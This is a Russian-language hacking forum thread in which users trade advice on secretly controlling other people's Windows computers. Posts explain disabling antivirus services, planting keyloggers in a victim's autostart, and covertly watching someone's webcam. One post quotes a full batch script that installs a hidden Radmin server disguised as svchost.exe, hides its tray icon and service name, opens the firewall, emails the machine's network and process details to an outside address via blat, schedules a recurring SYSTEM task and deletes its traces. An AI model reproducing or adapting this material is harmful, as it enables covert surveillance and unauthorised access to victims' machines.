Через телнет ты только коннектишься к хосту, а команды уже пишешь, когда получаешь приглашение системы.
1) выполни services.msc, найди в списке процессов этот антивирус и запиши название его процесса (если не можешь сделать этого на похеканой машине, заинсталь аналогичный антивирус у себя где-то - чтобы узнать название процесса). 2) в командной строке пишешь: sc config ИМЯ_ПРОЦЕССА start= disabled ЕСЛИ ПРОЦЕСС НЕ ЗАЩИЩЕН, то он после перезагрузки не стартанет, иначе выдаст ошибку наподобии permission denied.
привет народ, подскажите такую вещь. Есть комп с радмином, надо туда поставить кейлокер, я так понимаю надо такой что бы в авто запуск его поставить, или подскажите как поставить АктуалСпи удаленно при помощи радмина.
конечно в автозапуск если кейлогер позволяет - настрой полностью его и скопируй файлы на комп жертве, а потом просто кинь ссылку в автозагрузку
Это я все прекрасно понимаю, вопрос в том какой (название программы) кейлокер для этого подходит, я конечно нашёл один под название Детектив, но хотелось бы что то по функциональней.
Статья супер, у меня вопрос, я знаю ip компа, имею к нему физический доступ но не постоянный, как мне с ним управлять со своего компа
Со своего компа, навряд ли получится, а так качаешь архив "111", разархивируешь его, там у тебя будет файл 111.bat, !!!Не забудь при этом антивирус вырубить, а то заругается!!! Приносишь разархивируную папку на тот комп и запускаеть 111.Бат !!!Про антивирус опять не забываем!!! После запуска можно уже конектиться к этому компу, не забудь узнать его IP в сети, и скачай прогу Радмин Вьювер, с помощью её и будешь конектиться. вот вроде и все
а какого именно? чья сборка была? вроде там если не скрытаят установка,то можно ограничить и порт поменять,а так посмотри в *.bat
А вот такой глупый вопросик) Там стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32. А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из этих каталогов? Тоесть автоматизировать это дело) Чтото вроде таблетки. Буду весьма благодарен за помощь) Текст bat файла сборки: Code: cmdow @ /HID copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe" copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib" copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll" copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start %SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f [email protected] -u user -pw pass ipconfig /all > %systemroot%/system32/ip.txt tasklist > %systemroot%/system32/task.txt blat.exe %systemroot%/system32/ip.txt -to [email protected] blat.exe %systemroot%/system32/task.txt -to [email protected] schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat del cmdow.exe del blat.exe del blat.lib del blat.dll del raddrv.dll del admdll.dll del svchost.exe del install.bat
НАРОД ПОМОГИТЕ - ЕСТЬ КОМП С ВЕБКОЙ И ПОЛНЫМ ДОСТУПОМ - ВИНДА - АНТИВИРУС МОЯ И Т.Д - КАК МНЕ С НИМ НАТИХОРЯ КОНЕКТИТСЯ А ЕЩЕ ЛУТЧЕ ВЕБКУ СМОТРЕТЬ ... АЙПИ ПОСТОЯННЫЕ - НО МЫ У РАЗНЫХ ПРОВАЙДЕРОВ - У МЕНЯ ВАЙ ФАЙ - И СЕТКА ГОРОДСКАЯ - ОН НА САТЕЛИТ ПО ДОМАМ КАБЕЛЬ КИДАЮТ СЕТЕВОЙ .... Р АДМИНА - СТАВИЛ НЕ ПОЛУЧАЕТСЯ КОНЕКТИТСЯ - ПОМОГИТЕ КАК НАСТРОИТЬ - КАКОЙ ИМЕННО АЙПИ ЕГО ???
версия 2.2 работает на win7? У меня есть сборка 2.х, не знаю какая точно и на виндовс 7 при коннекте на просмотр или управление - черный экран и все. Можно как-то сделать скрытой версию 3.4(http://torrents.ru/forum/viewtopic.php?t=2502247)? Я пробовал все файлы что он установил и ветку реестра скидывать на другой комп и сервис не хочет устанавливаться, что я делаю не так?Если надо какието подробности, скажите - опишу
в радмине нет такой функции подобная функция есть у Remote Office Manager точнее там есть готовый бэк-конект